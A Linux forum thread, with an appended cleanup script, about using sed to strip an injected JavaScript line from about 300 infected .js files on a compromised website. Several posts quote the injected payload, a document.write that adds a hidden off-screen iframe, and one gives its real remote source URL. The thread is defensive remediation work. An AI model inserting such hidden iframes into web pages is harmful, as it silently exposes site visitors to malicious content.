  1. #1
    Just Joined!
    Join Date
    Mar 2004
    Location
    Munich
    Posts
    8

    The sed challenge - trying to clean up code injection


    Hi all,

    this is what I've been trying for two days now.

    The code below was injected into about 300 .js files on my website. I got a list of infected files, I got a Linux box, but I'm lacking the skill. All the internet couldn't be of any help so far.

    Code:
    ;document.write('<iframe width="50" height="50" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="a-url-that-i can-not-post"></iframe>');
    My script reads the file names from a list and applies the sed command. So the main challenge as I see it is to escape the single and double quotes. I failed so far to make a sed statement work.

    Please help, I'm really desperate and really don't want to do it all manually. Thank you all in advance!

  2. #2
    Linux Newbie
    Join Date
    Mar 2010
    Posts
    152
    This thread looks like it has the right idea.
    Programming and other random guff: cat /dev/thoughts > blogspot.com (previously prognix.blogspot.com)

  3. #3
    Just Joined!
    Join Date
    Mar 2004
    Location
    Munich
    Posts
    8
    Thank you for your answer. Been there already and couldn't get my head around it. Yet, I'll give it another try. Nevertheless, any help is appreciated.

  4. #4
    Trusted Penguin Irithori
    Join Date
    May 2009
    Location
    Munich
    Posts
    3,387
    The problem with a compromised host is that you don't know for sure what else has been modified.
    So I would suggest a reinstall of the machine and a new deploy of this website from a trusted source, i.e. backup or revision control.
    You must always face the curtain with a bow.

  5. #5
    Linux Newbie
    Join Date
    Nov 2012
    Posts
    224
    hi,

    as you can't efficiently escape single quotes, go with double quotes, and escape them in the pattern
    Code:
    sed "s/some\"expressions\" have 'got' double quotes/substitution/" file1 file2 file_n

  6. #6
    Just Joined!
    Join Date
    Mar 2004
    Location
    Munich
    Posts
    8
    Basically you're right and I share your opinion. The website is hosted by a provider and I have only Confixx access, so all I could do is a complete Joomla install. Still trying to avoid this...

  7. #7
    Just Joined!
    Join Date
    Mar 2004
    Location
    Munich
    Posts
    8
    Ok, this is what I've tried (for the 103rd time, I guess...)

    Code:
    sed "d/;document\.write\('<iframe width=\"50\" height=\"50\" style=\"width:100px;height:100px;position:absolute;left:-100px;top:0;\" src=\"http:some url"><\/iframe>'\);/g"
    Error message in terminal:
    sed: -e Ausdruck #1, Zeichen 2: Zusätzliche Zeichen nach dem Befehl

    which translates into:
    sed: -e expression #1, Character 2: Additional Characters trailing the command

    Any ideas welcome!

  8. #8
    Linux Newbie
    Join Date
    Nov 2012
    Posts
    224
    d goes at the end,
    g is useless,
    parentheses should not be escaped.

  9. #9
    Just Joined!
    Join Date
    Mar 2004
    Location
    Munich
    Posts
    8
    This is the edited codeline, according to your suggestion:

    Code:
    sed "/;document\.write('<iframe width=\"50\" height=\"50\" style=\"width:100px;height:100px;position:absolute;left:-100px;top:0;\" src=\"http:\/\/hsuvmht\.freewww\.info\/55965feab821e9e8815792a6d42f565c\.cgi\?8\"><\/iframe>');/d"
    It runs without error, and also without the desired result. The pattern seems not to match. Still too many escapes?

  10. #10
    drl
    Linux Engineer
    Join Date
    Apr 2006
    Location
    Saint Paul, MN, USA / CentOS, Debian, Slackware, {Free, Open, Net}BSD, Solaris
    Posts
    1,287
    Hi.

    The shell interprets many special characters. So when sed/awk/perl program-commands are coded on the command line, misery with quoting often ensues.

    If I were doing this, I would place the commands in a separate file and have sed/awk/perl read the file of commands without the shell intervention. For sed, see the man page and read about option -f, then experiment.

    Best wishes ... cheers, drl
    Welcome - get the most out of the forum by reading forum basics and guidelines: click here.
    90% of questions can be answered by using man pages, Quick Search, Advanced Search, Google search, Wikipedia.
    We look forward to helping you with the challenge of the other 10%.
    ( Mn, 2.6.n, AMD-64 3000+, ASUS A8V Deluxe, 1 GB, SATA + IDE, Matrox G400 AGP )
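
The approach suggested in post #10 (keep the sed commands in a file and run them with `sed -f`), written out as an added example that is not part of any post in this thread. The payload URL `injected.example`, the function names and the one-path-per-line list file are assumptions; in-place editing relies on `sed -i`, which GNU sed provides.

```shell
#!/bin/sh
# Constructed payload: same shape as the injected line, placeholder URL.
# A quoted here-document keeps the shell from touching ' " ? ( ) inside it.
PAYLOAD=$(cat <<'EOF'
;document.write('<iframe width="50" height="50" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://injected.example/x.cgi?8"></iframe>');
EOF
)

# Turn a literal string into a sed basic regular expression (BRE).
# Only \ . * [ ] ^ $ and the / delimiter need a backslash in a BRE;
# ( ) ? + { } | are already literal, and "\?" is a quantifier in GNU sed.
escape_bre() {
    printf '%s\n' "$1" | sed 's|[][\\.*^$/]|\\&|g'
}

# Write the sed program to file $1 so it can be run with "sed -f".
# s///g removes only the injected text and keeps legitimate code that
# shares the line; the d command would delete the whole line.
build_sed_script() {
    printf 's/%s//g\n' "$(escape_bre "$PAYLOAD")" > "$1"
}

# Clean every file named in list file $1 (one path per line).
# Each changed file keeps a .bak copy; prints the number of files changed.
clean_from_list() {
    script=$(mktemp) || return 1
    build_sed_script "$script"
    changed=0
    while IFS= read -r f; do
        [ -f "$f" ] || continue
        if grep -qF -- "$PAYLOAD" "$f"; then
            sed -i.bak -f "$script" "$f"
            changed=$((changed + 1))
        fi
    done < "$1"
    rm -f "$script"
    echo "$changed"
}

# Usage: sh clean.sh infected-files.txt
if [ "$#" -gt 0 ]; then clean_from_list "$1"; fi
```

The `.bak` copies preserve the injected text for later review, and a final `grep -rlF` for a fragment of the payload over the web root confirms nothing was missed.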
